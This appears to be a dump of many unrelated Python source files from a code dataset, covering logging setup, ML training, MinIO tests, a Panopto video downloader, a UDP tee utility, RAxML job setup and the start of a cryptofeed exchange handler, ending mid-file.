content stringlengths 5 1.05M |
|---|
import logging
import os
class DIDFormatter(logging.Formatter):
    """Log formatter tolerant of records that lack a ``requestId``.

    Log messages normally look like "level instance component request_id msg"
    and the request id is injected by the logging setup.  Handlers may also
    log records that carry their own ``requestId``; when the attribute is
    missing entirely we substitute ``None`` so formatting never fails.
    """

    def format(self, record: logging.LogRecord) -> str:
        """Format *record*, defaulting ``requestId`` to ``None`` when unset.

        :param record: LogRecord
        :return: formatted log message
        """
        if not hasattr(record, "requestId"):
            record.requestId = None
        return super().format(record)
def initialize_root_logger(did_scheme: str):
    """Configure the root logger to emit the DID-finder log format.

    :param did_scheme: The scheme name to identify this did finder in log messages.
    :return: the root logger, writing INFO-level records to the console.
    """
    instance = os.environ.get('INSTANCE_NAME', 'Unknown')
    formatter = DIDFormatter(
        f"%(levelname)s {instance} {did_scheme}_did_finder %(requestId)s %(message)s")

    console = logging.StreamHandler()
    console.setFormatter(formatter)
    console.setLevel(logging.INFO)

    root = logging.getLogger()
    root.addHandler(console)
    root.setLevel(logging.INFO)
    return root
|
from django.db import models
def build_models(payment_class):
    """Return the payment models for *payment_class* (currently always empty)."""
    return []
|
import time
import pickle
import numpy as np
from nltk.corpus import stopwords
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.metrics import average_precision_score, recall_score, f1_score,\
classification_report
def add_to_array(array: list, word: str, val: str, features, stemmer):
    """Accumulate *val* into *array* at the feature index matching *word*.

    Stop words are skipped.  The word is stemmed before lookup in *features*;
    words not present in *features* are silently ignored.

    :param array: per-feature accumulator, indexed like *features*.
    :param word: raw token to account for.
    :param val: count to add (string, converted with int()).
    :param features: ordered collection of known (stemmed) feature words.
    :param stemmer: object exposing ``stem(word)``.
    """
    # Cache the stopword list once as a frozenset: stopwords.words() rebuilds
    # a large list on every call and membership tests on a list are O(n).
    if not hasattr(add_to_array, "_stopwords"):
        add_to_array._stopwords = frozenset(stopwords.words())
    if word in add_to_array._stopwords:
        return
    word = stemmer.stem(word)
    if word in features:
        array[features.index(word)] += int(val)
def get_unused_dataset_indxs(dataset, bottom_threshold, top_threshold):
summed_dataset = np.sum(dataset, axis=0)
bottom_indxs_delete = summed_dataset <= bottom_threshold
top_indxs_delete = summed_dataset >= top_threshold
cols_to_delete = np.logical_or(bottom_indxs_delete, top_indxs_delete)
return [indx for indx in range(len(cols_to_delete)) if cols_to_delete[indx]]
def get_unused_features(features_importance, threshold=0):
    """Return indices of features whose importance is <= *threshold*.

    :param features_importance: 1-D numpy array of importance scores.
    :param threshold: importance cutoff (inclusive), default 0.
    :return: list of feature indices considered unused.
    """
    # flatnonzero replaces the manual index loop with a vectorized scan.
    return np.flatnonzero(features_importance <= threshold).tolist()
def concat_features(features_a, features_b, file):
    """Pickle the union of two feature collections to *file*.

    The union is stored as a list; element order is unspecified because the
    merge goes through a set.
    """
    merged = list(set(features_a) | set(features_b))
    with open(file, 'wb') as handle:
        pickle.dump(merged, handle)
def split_to_train_test(features_and_labels: list, test_set_percent=0.4,
                        shuffle=True, labels=None):
    """Split a sample matrix into stratified train/test subsets.

    :param features_and_labels: 2-D array; when *labels* is None its last
        column is treated as the label column and stripped from the features.
    :param test_set_percent: fraction of samples placed in the test set.
    :param shuffle: whether to shuffle before splitting.  (Bug fix: this
        argument used to be ignored — shuffling was always on.)
    :param labels: optional explicit label array; raveled before use.
    :return: X_train, X_test, y_train, y_test from train_test_split.
    """
    features = features_and_labels
    if labels is None:
        labels = features_and_labels[:, -1:].ravel()
        features = features_and_labels[:, :-1]
    else:
        labels = labels.ravel()
    # Honour the caller's `shuffle` flag; sklearn forbids stratify without
    # shuffling, so stratification is only applied when shuffle is on.
    return train_test_split(features, labels, test_size=test_set_percent,
                            random_state=42, shuffle=shuffle,
                            stratify=labels if shuffle else None)
|
import mysql.connector

# Demo script: create a table, insert one row, read it back.
conn = mysql.connector.connect(user='root', password='root', database='test',
                               host='127.0.0.1', charset='utf8')
try:
    # Create the table and insert one row via a parameterized statement.
    cursor = conn.cursor()
    try:
        cursor.execute('create table user (id varchar(20) primary key,name varchar(20))')
        cursor.execute('insert into user values (%s,%s)', ['1', 'Twittytop'])
        print(cursor.rowcount)
        conn.commit()
    finally:
        # Bug fix: the cursor/connection used to leak if any statement raised.
        cursor.close()
    # Read the row back.
    cursor = conn.cursor()
    try:
        cursor.execute('select name from user where id = %s', ('1',))
        values = cursor.fetchall()
        print(values)
    finally:
        cursor.close()
finally:
    conn.close()
import subprocess
import textwrap
import pytest
import signal
import socket
import time
import os
PORT = 9000
HOST = 'localhost'
KEY = "testtesttest"
@pytest.fixture(scope="session")
def minio():
    """Session fixture: start a local MinIO server, tear it down afterwards."""
    # Setup
    # Credentials and server configuration are passed via the environment.
    os.environ['MINIO_ACCESS_KEY'] = KEY
    os.environ['MINIO_SECRET_KEY'] = KEY
    os.environ['MINT_MODE'] = 'full'
    os.environ['ACCESS_KEY'] = KEY
    os.environ['SECRET_KEY'] = KEY
    os.environ['ENABLE_HTTPS'] = "0"
    # Prefer a ./minio binary in the working directory over one on the PATH.
    if os.path.exists("minio"):
        command = "./minio"
    else:
        command = "minio"
    # NOTE(review): this runs the binary with no subcommand before the real
    # server start; minio normally exits non-zero in that case, which would
    # make check_call raise -- confirm whether this is meant as an
    # availability check.
    subprocess.check_call(command)
    # setsid puts the shell and the server in their own process group so the
    # whole group can be killed on teardown.
    process = subprocess.Popen(command + " server data", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
    # wait for start
    # Poll the server port until it accepts TCP connections.
    not_running = True
    while not_running:
        try:
            s = socket.socket()
            s.connect((HOST, PORT))
            not_running = False
        except Exception as e:
            time.sleep(0.5)
        finally:
            s.close()
    yield
    # Teardown
    os.killpg(process.pid, signal.SIGTERM)
def write_gdalconfig_for_minio(f):
    """Write a nrtpredict YAML config (to Path *f*) that points GDAL's
    /vsis3 driver at the local MinIO test server (plain HTTP, test keys)."""
    f.write_text(textwrap.dedent(f"""\n
    saveobs: /tmp/obs.tif
    gdalconfig:
      GDAL_DISABLE_READDIR_ON_OPEN: YES
      CPL_VSIL_CURL_ALLOWED_EXTENSIONS: '.tif,.geojson'
      CPL_VSIL_USE_TEMP_FILE_FOR_RANDOM_WRITE: YES
      #CPL_CURL_VERBOSE: YES
      CPL_DEBUG: YES
      AWS_HTTPS: NO
      AWS_VIRTUAL_HOSTING: FALSE
      AWS_S3_ENDPOINT: {HOST}:{PORT}
      AWS_SECRET_ACCESS_KEY: {KEY}
      AWS_ACCESS_KEY_ID: {KEY}
    """))
def test_gdal_with_minio(minio):
    """Read a small window from a GeoTIFF on the MinIO server through /vsis3."""
    from osgeo import gdal
    import numpy as np
    gdal.UseExceptions()
    # Point GDAL's S3 driver at the local, plain-HTTP MinIO endpoint.
    gdal.SetConfigOption('AWS_HTTPS', 'NO')
    gdal.SetConfigOption('GDAL_DISABLE_READDIR_ON_OPEN', 'YES')
    gdal.SetConfigOption('AWS_VIRTUAL_HOSTING', 'FALSE')
    gdal.SetConfigOption('AWS_S3_ENDPOINT', f'{HOST}:{PORT}')
    gdal.SetConfigOption('AWS_SECRET_ACCESS_KEY', KEY)
    gdal.SetConfigOption('AWS_ACCESS_KEY_ID', KEY)
    path = '/vsis3/test/S2A_OPER_MSI_ARD_TL_VGS1_20210205T055002_A029372_T50HMK_N02.09/NBAR/NBAR_B01.TIF'
    ds = gdal.Open(path)
    band = ds.GetRasterBand(1)
    # Read a 10x10 window from the top-left corner of band 1.
    xoff, yoff, xcount, ycount = (0, 0, 10, 10)
    data = band.ReadAsArray(xoff, yoff, xcount, ycount)
    # Real data should contain non-zero values.
    assert np.sum(data) > 0
def test_empty_config_s3(minio, tmp_path):
    """nrtpredict should run against S3 even when the config starts empty."""
    config = tmp_path / "test.yaml"
    config.touch()
    write_gdalconfig_for_minio(config)
    subprocess.check_call(
        ['./nrtpredict.py', '-c', config,
         's3://test/S2A_OPER_MSI_ARD_TL_VGS1_20210205T055002_A029372_T50HMK_N02.09'])
#def test_ancillary_on_s3(minio, tmp_path):
# f = tmp_path / "test.yaml"
# g = tmp_path / "clip.geojson"
# f.write_text(textwrap.dedent("""
# clipshpfn: {g}
# models:
# - name: NoOp
# output: nbr.tif
# inputs:
# - filename: s3://test/s2be.tif
# """))
# write_gdalconfig_for_minio(f)
# subprocess.check_call(['./nrtpredict.py', '-c', f, 's3://test/S2A_OPER_MSI_ARD_TL_VGS1_20210205T055002_A029372_T50HMK_N02.09'])
# #assert os.path.exists(g)
|
import os
import requests
import time
import json
import argparse
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import progressbar
import urllib.request
import getpass
progress_bar = None
json_file_path = "network_log.json"
def show_progress(block_num, block_size, total_size):
    """urlretrieve reporthook: draw a progress bar for the current download.

    Lazily creates the module-level bar on the first callback and resets it
    once the downloaded byte count reaches the total size.
    """
    global progress_bar
    if progress_bar is None:
        progress_bar = progressbar.ProgressBar(maxval=total_size)
        progress_bar.start()
    downloaded = block_num * block_size
    if downloaded >= total_size:
        progress_bar.finish()
        progress_bar = None
    else:
        progress_bar.update(downloaded)
def resource_path(relative_path):
    """Resolve *relative_path* against the application's base directory.

    Under a PyInstaller bundle the base directory is ``sys._MEIPASS``;
    otherwise it is the directory containing this script.

    :param relative_path: path relative to the application root.
    :return: absolute (joined) path to the resource.
    """
    import sys  # local import: `sys` is not imported at module level
    try:
        base_path = sys._MEIPASS
    except AttributeError:
        # Bug fix: previously this relied on catching the NameError from the
        # missing `sys` import; now only the absent attribute is handled.
        base_path = os.path.dirname(__file__)
    return os.path.join(base_path, relative_path)
if __name__ == "__main__":
    print(
        """\n
Please do not close the main browser window if you want to be able to keep downloading videos.
\n""")
    # Enable Chrome performance logging so network requests can be inspected.
    desired_capabilities = DesiredCapabilities.CHROME
    desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"}
    options = webdriver.ChromeOptions()
    options.add_experimental_option('excludeSwitches', ['enable-logging'])
    options.add_argument("--ignore-certificate-errors")
    # parser = argparse.ArgumentParser(description='Downloads selected videos from panopto.')
    # parser.add_argument('-headless', action="store_false", help='If specified opens up with browser')
    # args = parser.parse_args()
    driver = webdriver.Chrome(resource_path('./driver/chromedriver.exe'), options=options, desired_capabilities=desired_capabilities)
    driver.get("http://login.panopto.com/")
    # Wait until the user confirms they have logged in manually.
    while True:
        check = input("Please type 'yes' if you have logged in to panopto: ")
        if check.lower() == 'yes':
            break
    # Main loop: one iteration per video URL entered by the user.
    while True:
        mainUrl = input("Please input the video URL: ")
        if mainUrl.replace(" ", "") == "":
            print('\n')
            continue
        driver.get(mainUrl)
        print("\n Initializing... \n\n")
        time.sleep(3)
        # If an external login button appears, click through and reload.
        if not len(driver.find_elements(By.ID, "PageContentPlaceholder_loginControl_externalLoginButton")) == 0:
            print("logging in to panopto \n")
            driver.find_element(By.ID, "PageContentPlaceholder_loginControl_externalLoginButton").click()
            time.sleep(.5)
            driver.get(mainUrl)
            time.sleep(3)
        # Dump the captured network events to a JSON file, then re-read them.
        logs = driver.get_log("performance")
        with open(json_file_path, "w", encoding="utf-8") as f:
            f.write("[")
            for log in logs:
                network_log = json.loads(log["message"])["message"]
                if("Network.response" in network_log["method"]
                        or "Network.request" in network_log["method"]
                        or "Network.webSocket" in network_log["method"]):
                    f.write(json.dumps(network_log)+",")
            # Trailing empty object keeps the JSON array valid after the
            # trailing commas written above.
            f.write("{}]")
        with open(json_file_path, "r", encoding="utf-8") as f:
            logs = json.loads(f.read())
        # Look for either an HLS segment (.ts) or a direct .mp4 media request.
        url_found = False
        mp4 = False
        mp4s = []
        for log in logs:
            try:
                url = log["params"]["request"]["url"]
                if url[len(url)-3:] == ".ts":
                    url_found = True
                    print(f'Media file found in URL: \n {url}', end='\n\n')
                    break
                elif log["params"]["type"] == "Media" and ".mp4" in url:
                    url_found = True
                    mp4 = True
                    mp4s.append(url)
            except Exception as e:
                # Not every log entry has params/request/url -- skip those.
                pass
        if url_found:
            if not mp4:
                fileName = input('Output name (Do not put any extension): ')
                while os.path.exists(f'{fileName}.ts'):
                    print("\n File already exists please enter a new name")
                    fileName = input('Output name: ')
                # Fetch numbered segments until the server answers with an
                # error document or an empty body.
                i = 0
                while True:
                    # Build a 5-digit segment index, e.g. 00000, 00001, ...
                    number = '00' + '0' * (3-len(str(i))) + str(i)
                    # Drop the previous "00000.ts"-style suffix (8 chars)
                    # before appending the next index.
                    url = url[ : -8]
                    url = f'{url}{number}.ts'
                    r=requests.get(url)
                    if r.content.startswith(b'<?xml version="1.0" encoding="UTF-8"?>\n<Error>') or r.content == b'':
                        print("\n\n")
                        break
                    print(f'Video index: "{number}"')
                    print(url, end= "\n")
                    # Append every segment to a single output .ts file.
                    open(f'{fileName}.ts', 'ab').write(r.content)
                    i+=1
            else:
                # NOTE(review): `url` is whatever the loop above saw last,
                # which is not necessarily one of the .mp4 URLs collected in
                # `mp4s` -- hence the warning printed to the user.
                print(
                    f"""\n\n This is a single mp4 file download, it may not perfectly work.
If it didn't download the right video please send me a message together with the url of video you are trying to download and with this url:
{url} \n\n""")
                fileName = input('Output name (Do not put any extension): ')
                while os.path.exists(f'{fileName}.mp4'):
                    print("\n File already exists please enter a new name")
                    fileName = input('Output name: ')
                print("Please wait...")
                r=requests.get(url)
                urllib.request.urlretrieve(url, f"{fileName}.mp4", show_progress)
                print(
                    f"""If it didn't download the right video you can also manually find and download the video you want, from here:
{mp4s} \n""")
        else:
            print("media file couldn't be found.", end="\n\n")
        # Clean up the temporary network log between downloads.
        if os.path.exists("network_log.json"):
            os.remove("network_log.json")
        else:
            print("json file doesn't exist")
    driver.quit()
import torch
from jaclearn.logic.propositional.logic_induction import search
from tqdm import tqdm
def get_logic_formula(inputs, outputs, in_names, f):
    """Search a boolean formula for every output dimension.

    inputs, outputs are torch tensors (flattened to 2-D internally);
    in_names are the names for the input variables;
    f[k] is the set of input indices considered for the k-th output.
    Returns a list with one formula string per output column.
    """
    inputs = inputs.view(-1, inputs.size(-1))
    outputs = outputs.view(-1, outputs.size(-1))
    assert inputs.size(-1) == len(in_names)
    assert outputs.size(-1) == len(f)

    formulas = []
    bar = tqdm(range(outputs.size(-1)))
    bar.set_description('Computing logic formulas')
    for k in bar:
        candidate_ids = sorted(f[k])
        if not candidate_ids:
            # No inputs are considered, so the output must be constant.
            lo = int(outputs.type(torch.int).min().item())
            hi = int(outputs.type(torch.int).max().item())
            assert hi == lo
            formulas.append('True' if hi > .5 else 'False')
        else:
            sub_inputs = inputs[:, torch.LongTensor(candidate_ids)].type(torch.uint8).numpy().astype('uint8')
            sub_names = [in_names[fid] for fid in candidate_ids]
            sub_outputs = outputs[:, k:k + 1].type(torch.uint8).numpy().astype('uint8')
            # Sanity-check the truth table before running the search.
            check_logic_data(sub_inputs, sub_outputs, sub_names)
            formulas.append(str(search(sub_inputs, sub_outputs, sub_names)))
    return formulas
def check_logic_data(inputs, outputs, names):
    """Validate a truth table before boolean formula search.

    Ensures all entries are strictly binary (0/1) and that no input row is
    mapped to two different outputs, i.e. the data is a function of the
    inputs.

    :param inputs: array of shape (B, len(names)) with 0/1 entries.
    :param outputs: array of shape (B, 1) with 0/1 entries.
    :param names: one variable name per input column.
    :raises ValueError: on non-binary entries or contradictory rows.
    """
    n = len(names)
    B = inputs.shape[0]
    assert inputs.shape == (B, n)
    assert outputs.shape == (B, 1)
    ans = {}
    for i in range(B):
        # Encode the input row as a '0'/'1' string to use as a lookup key.
        in_str = ''
        for k in range(n):
            if int(inputs[i, k]) == 1:
                in_str += '1'
            elif int(inputs[i, k]) == 0:
                in_str += '0'
            else:
                # Bug fix: the bare ValueError() gave no hint what failed.
                raise ValueError(f'non-binary input value at row {i}, column {k}')
        if int(outputs[i, 0]) == 1:
            out_str = '1'
        elif int(outputs[i, 0]) == 0:
            out_str = '0'
        else:
            raise ValueError(f'non-binary output value at row {i}')
        if in_str in ans:
            if ans[in_str] != out_str:
                print("Different output for same input")
                raise ValueError(f'contradictory outputs for input {in_str}')
        ans[in_str] = out_str
    print(ans)
|
# Small interactive demo: read numbers until the user quits with q/Q.
while True:
    print('Press Q to quit')
    a = input('Enter a Number: ')
    # Bug fix: accept both 'Q' and 'q', as the prompt advertises.
    if a.lower() == 'q':
        break
    try:
        print('Trying...')
        a = int(a)  # raises ValueError on non-numeric input
        if a > 6:
            print('You Enter a number greater than 6')
    except Exception as e:
        print(f'Your input resulted in an error! {e}')
print('Thank You for playing this game')
import warnings
warnings.filterwarnings("ignore")
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
plt.style.use('ggplot')
import torch
print(torch.__version__)
import torch.nn as nn # содержит функции для реалзации архитектуры нейронных сетей
import torch.optim as optim
import torch.utils.data as data_utils
from torch.utils.tensorboard import SummaryWriter
from pytorch_lightning.metrics import Accuracy
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
# Network architecture and training hyper-parameters.
INPUT_SIZE = 37
HIDDEN_SIZE = 25
OUTPUT_SIZE = 4
LEARNING_RATE = 1e-2
EPOCHS = 400
BATCH_SIZE = 256
# TensorBoard writers for train and validation metrics.
train_writer = SummaryWriter('./logs/train')
valid_writer = SummaryWriter('./logs/valid')
def load_dataset():
    """Load features and labels from the tab-separated CSVs on disk.

    The 'Died' target class is merged into 'Euthanasia' before the labels
    are integer-encoded.

    :return: (feature DataFrame, integer label array)
    """
    X = pd.read_csv('./data/X_cat.csv', sep='\t', index_col=0)
    target = pd.read_csv('./data/y_cat.csv', sep='\t', index_col=0, names=['status'])
    print(X.shape)
    print(X.head())
    target = target.iloc[:, :].values
    # Collapse the rare 'Died' outcome into 'Euthanasia'.
    target[target == 'Died'] = 'Euthanasia'
    encoder = LabelEncoder()
    return X, encoder.fit_transform(target)
def create_data_loader(X, y):
    """Make a standardized, stratified train/test split wrapped in DataLoaders.

    :param X: feature DataFrame (``.values`` is used).
    :param y: integer label array.
    :return: X_train, X_test, y_train, y_test, train_loader, test_loader
    """
    X_train, X_test, y_train, y_test = train_test_split(
        X.values, y, test_size=0.2, stratify=y, random_state=42)
    # Fit the scaler on the training set only, then apply it to both splits.
    scaler = StandardScaler()
    X_train = scaler.fit_transform(X_train)
    X_test = scaler.transform(X_test)

    def _make_loader(features, labels, shuffle):
        # Wrap the numpy arrays as a tensor dataset and batch it.
        dataset = data_utils.TensorDataset(
            torch.tensor(features.astype(np.float32)), torch.tensor(labels))
        return data_utils.DataLoader(dataset=dataset, batch_size=BATCH_SIZE,
                                     shuffle=shuffle)

    train_loader = _make_loader(X_train, y_train, True)
    test_loader = _make_loader(X_test, y_test, False)
    return X_train, X_test, y_train, y_test, train_loader, test_loader
class MLPNet(nn.Module):
    """Three-layer perceptron that outputs class probabilities via softmax."""

    def __init__(self, input_size, hidden_size, output_size):
        super(MLPNet, self).__init__()
        self.linear1 = torch.nn.Linear(input_size, hidden_size)
        self.linear2 = torch.nn.Linear(hidden_size, hidden_size)
        self.linear3 = torch.nn.Linear(hidden_size, output_size)

    def forward(self, x):
        """Map a (batch, input_size) tensor to (batch, output_size) probabilities."""
        hidden = torch.relu(self.linear1(x))
        hidden = torch.relu(self.linear2(hidden))
        return torch.softmax(self.linear3(hidden), dim=1)
def run_train(model):
    """Train *model* for EPOCHS epochs, logging metrics to TensorBoard.

    Relies on module-level globals: train_loader, test_loader, optimizer,
    criterion, accuracy, train_writer, valid_writer and EPOCHS.
    """
    step = 0
    for epoch in range(EPOCHS):
        model.train()
        for features, label in train_loader:
            # Reset gradients
            optimizer.zero_grad()
            output = model(features)
            # Calculate error and backpropagate
            loss = criterion(output, label)
            loss.backward()
            acc = accuracy(output, label).item()
            # Update weights with gradients
            optimizer.step()
            train_writer.add_scalar('CrossEntropyLoss', loss, step)
            train_writer.add_scalar('Accuracy', acc, step)
            step += 1
            if step % 50 == 0:
                print('EPOCH %d STEP %d : train_loss: %f train_acc: %f' %
                      (epoch, step, loss, acc))
        # Log the first layer's weights once per epoch.
        train_writer.add_histogram('hidden_layer', model.linear1.weight.data, step)
        # Run validation
        running_loss = []
        valid_scores = []
        valid_labels = []
        model.eval()
        with torch.no_grad():
            for features, label in test_loader:
                output = model(features)
                # Calculate error and backpropagate
                loss = criterion(output, label)
                running_loss.append(loss.item())
                valid_scores.extend(torch.argmax(output, dim=1))
                valid_labels.extend(label)
        # Accuracy over the whole validation set, not per batch.
        valid_accuracy = accuracy(torch.tensor(valid_scores), torch.tensor(valid_labels)).item()
        valid_writer.add_scalar('CrossEntropyLoss', np.mean(running_loss), step)
        valid_writer.add_scalar('Accuracy', valid_accuracy, step)
        print('EPOCH %d : valid_loss: %f valid_acc: %f' % (epoch, np.mean(running_loss), valid_accuracy))
    return
# ---- Training entry point (module level) ----
features, labels = load_dataset()
X_train, X_test, y_train, y_test, train_loader, test_loader = create_data_loader(features, labels)
model = MLPNet(INPUT_SIZE, HIDDEN_SIZE, OUTPUT_SIZE)
# NOTE(review): CrossEntropyLoss expects raw logits, but MLPNet.forward
# already applies softmax -- this "double softmax" weakens gradients;
# consider returning logits from the model instead.
criterion = nn.CrossEntropyLoss()
accuracy = Accuracy()
optimizer = optim.SGD(model.parameters(), lr=LEARNING_RATE)
# Record hyper-parameters and the model graph in TensorBoard.
train_writer.add_text('LEARNING_RATE', str(LEARNING_RATE))
train_writer.add_text('INPUT_SIZE', str(INPUT_SIZE))
train_writer.add_text('HIDDEN_SIZE', str(HIDDEN_SIZE))
train_writer.add_text('NROF_CLASSES', str(OUTPUT_SIZE))
train_writer.add_text('BATCH_SIZE', str(BATCH_SIZE))
train_writer.add_graph(model, torch.tensor(X_test.astype(np.float32)), verbose=True)
run_train(model)
import random
import arcade
class Cactus(arcade.Sprite):
    """Obstacle sprite: a randomly chosen night-time cactus image that
    scrolls horizontally across the screen."""
    def __init__(self, width, height, speed):
        super().__init__()
        # Pick one of the two cactus textures at random.
        self.pic_path = random.choice(['images/cactus1_night.png','images/cactus4_night.png'])
        self.texture = arcade.load_texture(self.pic_path)
        # Spawn at the right edge (x = screen width) on a fixed ground line.
        self.center_x = width
        self.center_y = 164
        self.change_x = speed #-4
        self.change_y = 0
        self.width = 100
        self.height = 100
#!/usr/bin/python
import sys,os,re,optparse,tarfile,uuid,math,glob
from arguments_RAxML import *
def TF(inputTF):
    """Render an option value as the literal string "True" or "False".

    Values equal to None or False (note: 0 == False) map to "False";
    everything else maps to "True".
    """
    if inputTF in (None, False):
        return "False"
    return "True"
'''
Builds the submit file for RAxML runs
'''
def main():
    # Set up HTCondor files (run_RAxML.dag + run_RAxML.submit) for running
    # RAxML over every phylip/nexus alignment in the given data directory.
    current_version = "#version 1.0.1" #1.0.1 added code for RAxML flag -#
    current_RAxML_version = "raxmlHPC"
    instanceID = uuid.uuid4()
    parser = getParser()
    options, remainder = parser.parse_args()
    # noErrors acts as a validity flag: set to 0 on any fatal problem.
    noErrors = 1
    print("\n")
    #__________________________
    #fetch the working directory
    #__________________________
    try:
        working_dir = os.path.dirname(os.path.realpath(__file__))
    except:
        print("ERROR: problem determining working directory")
        noErrors = 0
    #__________________________
    # Work on data directory
    #__________________________
    data_dir = remainder[0]
    if( data_dir == None ):
        print("ERROR: no data directory provided. First argument after set_up_RAxML should be data directory")
        noErrors = 0
    else:
        if os.path.isdir(data_dir) != True :
            print("ERROR: data directory (" + data_dir + ") does not exist.")
            noErrors = 0
    if noErrors == 1:
        # Collect every alignment file and remember its type.
        myGenes = []
        myFiletypes = []
        filetypes = ('*.phy', '*.phylip', '*.nex') # the tuple of file types
        for filetype in filetypes:
            for file in glob.glob(data_dir + "/" + filetype):
                if filetype == "*.nex" :
                    # Nexus files get converted to phylip later; refuse to
                    # clobber an existing phylip file with the same basename.
                    phyFilename1 = os.path.splitext(os.path.basename(file))[0] + ".phy"
                    phyFilename2 = os.path.splitext(os.path.basename(file))[0] + ".phylip"
                    if (os.path.isfile(data_dir + "/" + phyFilename1) or os.path.isfile(data_dir + "/" + phyFilename2)):
                        print("ERROR: phylip file already exists for a nexus file("+file+"). Data would be overwritten when nexus file created.")
                        noErrors = 0
                myGenes.append(os.path.basename(file))
                myFiletypes.append(filetype)
        if len(myGenes) == 0 :
            print "ERROR: no phylip (*.phy) or nexus (*.nex) files found in data directory."
            noErrors = 0
        else:
            print "CHECKED: Found ", len(myGenes), "phylip files in directory:", working_dir+"/" + data_dir+"/."
    #__________________________
    # Work on LOG/ERR/OUT directories
    #__________________________
    if( os.path.isdir("log") ):
        print "CHECKED: - log/ directory exists."
    else:
        os.makedirs("log")
        print "ACTION: - log/ directory created."
    if( os.path.isdir("err") ):
        print "CHECKED: - err/ directory exists."
    else:
        os.makedirs("err")
        print "ACTION: - err/ directory created."
    if( os.path.isdir("out") ):
        print "CHECKED: - out/ directory exists."
    else:
        os.makedirs("out")
        print "ACTION: - out/ directory created."
    #If any errors prior to this point, stop
    if noErrors == 0 : sys.exit()
    #Build run_RAxML.dag which lists the individual genes to run
    st = "#instanceID="+str(instanceID)+"\n"
    st += "#This dag runs the individual genes through RAxML\n\n"
    whichGene = 0
    for file in myGenes:
        whichGene += 1
        basename = os.path.splitext(file)[0]
        st += 'JOB run_RAxML_' + str(whichGene) + ' run_RAxML.submit\n'
        st += 'VARS run_RAxML_' + str(whichGene) + ' filename="' + file + '" basename = "' + basename + '"\n'
        st += 'SCRIPT POST run_RAxML_' + str(whichGene) + ' pos_RAxML.py $RETURN ' + basename+ '\n\n'
    submit_file = open('run_RAxML.dag', 'w')
    submit_file.write(st)
    submit_file.close()
    #_________________________
    #Build run_RAxML.submit
    #- This job file submits each individual gene
    #_________________________
    st = "#instanceID="+str(instanceID)+"\n"
    st += "#Submit file for RAxML.\n\n"
    st += "universe = Vanilla\n\n"
    st += "executable = run_RAxML.py\n\n"
    st += "DDIR = " + working_dir + "/" + data_dir + "\n"
    st += "should_transfer_files = YES\n"
    st += "when_to_transfer_output = ON_EXIT\n\n"
    st += "transfer_input_files = run_RAxML.py, nexusToPhylip.py, raxmlHPC, $(DDIR)/$(filename)\n\n"
    st += "log = log/raxml.$(basename).log\n"
    st += "error = err/raxml.$(basename).err\n"
    st += "output = out/raxml.$(basename).out\n\n"
    st += "request_cpus = 1\n"
    st += "request_disk = 5000\n"
    st += "request_memory = 1000\n\n"
    #st += "+wantFlocking = true\n"
    #st += "+wantGlidein = true\n\n"
    st += 'arguments = "' + buildArgList("R", options) + " "
    st += '-s $(filename) -n $(basename)"\n'
    st += "queue \n\n"
    submit_file = open('run_RAxML.submit', 'w')
    submit_file.write(st)
    submit_file.close()
    print "\n\nProgram set_up finished successfully."
    print "run_RAxML.dag has been created.\n\n"
main()
|
from enum import Enum
class AntType(Enum):
    """Role of an ant agent."""
    Explorer = 0
    Worker = 1
class MarkType(Enum):
    """Kind of mark an ant leaves behind."""
    Explored = 0
    FoodFound = 1
class TargetType(Enum):
    """What an ant is currently heading towards."""
    Explore = 0
    Home = 1
    Food = 2
|
from soniox.transcribe_file import transcribe_file_stream
from soniox.speech_service import Client, set_api_key
from soniox.test_data import TEST_AUDIO_LONG_FLAC
set_api_key("<YOUR-API-KEY>")
def main():
    """Stream-transcribe the bundled long FLAC sample, printing each result."""
    with Client() as client:
        for result in transcribe_file_stream(TEST_AUDIO_LONG_FLAC, client):
            words = (w.text for w in result.words)
            print(" ".join(words))
if __name__ == "__main__":
main() |
# Single source of truth for package version
__version__ = "0.3.8"
|
#!/usr/bin/env python3
'''
udptee.py - like `tee` but duplicates output to a udp destination instead of a
file
'''
import argparse
import sys
import os
import socket
def main(argv=None):
    """Copy stdin to stdout, duplicating every line to each UDP destination.

    :param argv: command-line vector (argv[0] is the program name, the rest
        are "host:port" destinations).  Defaults to ['udptee.py'], which makes
        argparse exit with a usage error since ADDRESS is required.
    """
    # Bug fix: the default used to be a mutable list literal (shared across
    # calls); use the None-sentinel idiom instead.
    if argv is None:
        argv = ['udptee.py']
    arg_parser = argparse.ArgumentParser(
        prog=os.path.basename(argv[0]), description=(
            'like `tee` but duplicates output to a udp destination '
            'instead of a file'))
    arg_parser.add_argument(
        metavar='ADDRESS', dest='addresses', nargs='+', help=(
            'destination address "host:port"'))
    args = arg_parser.parse_args(args=argv[1:])
    addrs = []
    for address in args.addresses:
        host, port = address.split(':')
        addrs.append((host, int(port)))
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # Unbuffered binary handles on stdin/stdout so lines pass through as-is.
    stdin = open(0, mode='rb', buffering=0)
    stdout = open(1, mode='wb', buffering=0)
    while True:
        line = stdin.readline()
        if not line:
            break
        stdout.write(line)
        for addr in addrs:
            # 1400 byte chunks to avoid EMSGSIZE
            for i in range((len(line) - 1) // 1400 + 1):
                sock.sendto(line[i * 1400:(i + 1) * 1400], addr)
if __name__ == '__main__':
main(sys.argv)
|
'''
Copyright (C) 2017-2020 Bryant Moscon - bmoscon@gmail.com
Please see the LICENSE file for the terms and conditions
associated with this software.
'''
import json
import logging
from decimal import Decimal
from itertools import product
from sortedcontainers import SortedDict as sd
from cryptofeed.defines import BID, ASK, BLOCKCHAIN, BUY, L2_BOOK, L3_BOOK, SELL, TICKER, TRADES
from cryptofeed.feed import Feed
from cryptofeed.standards import pair_exchange_to_std, timestamp_normalize
LOG = logging.getLogger('feedhandler')
class Blockchain(Feed):
    """Feed handler for the Blockchain.com exchange websocket gateway."""
    id = BLOCKCHAIN

    def __init__(self, pairs=None, channels=None, callbacks=None, **kwargs):
        super().__init__("wss://ws.prod.blockchain.info/mercury-gateway/v1/ws",
